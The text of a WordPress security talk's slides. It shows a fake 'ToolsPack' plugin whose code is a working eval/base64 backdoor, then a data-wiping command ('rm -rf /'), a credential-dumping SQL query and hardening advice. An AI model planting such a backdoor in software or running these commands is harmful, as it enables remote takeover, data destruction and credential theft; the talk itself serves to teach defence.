2. Chris Dodds
Owner & Principal Advisor at Focusfire IT
Strategy & Consulting
Features: Ten+ years of experience across
multiple industries and IT disciplines.
Certifications: CISSP, MCITP:SA, Security+, Network+
System Requirements: Food, water, & internet connectivity.
3. This talk is not about the
top 5 WP security threats.
10. ToolsPack Plugin
toolspack.php
<?php
/*
Plugin Name: ToolsPack
Description: Supercharge your WordPress site with powerful features previously only available to WordPress.com users. core release. Keep the plugin updated!
Version: 1.2
Author: Mark Stain
Author URI: http://checkWPTools.com/
*/
// Backdoor: base64-decodes whatever arrives in the "e" request parameter and eval()s it.
$_REQUEST[e] ? EVAL( base64_decode( $_REQUEST[e] ) ) : exit;
?>
Source - http://blog.sucuri.net/2012/02/new-wordpress-toolspack-plugin.html
11. This backdoor code allows the
remote user to:
Execute commands on your server
$WINDIR ? `del /F/S/Q $WINDIR*` : `rm -rf /`;
Execute commands against your WP database
SELECT CONCAT(login, '-', password) FROM users;
12. More Likely...
Payload - keylogger, trojan, spyware, virus
SEO Spam - links, keywords
“garden gnomes, free
chaps, leather sale,
cheap sex, porn,
prescription drugs,
coupons, free avon”
13. Best Practices
Update! Update! Update!
Backup & test your backups.
Use a unique passphrase.
Don’t use the “admin” user.
Disable or delete unused plugins.
14. These are all things your
attacker will do once they
control your site.